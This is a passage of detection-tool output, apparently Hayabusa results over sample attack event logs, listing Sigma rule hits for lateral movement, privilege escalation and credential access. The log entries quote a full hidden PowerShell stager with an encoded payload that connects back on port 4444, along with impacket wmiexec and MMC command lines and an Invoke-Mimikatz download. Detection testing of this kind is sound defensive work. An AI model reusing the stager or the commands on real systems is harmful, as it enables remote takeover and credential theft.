f2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
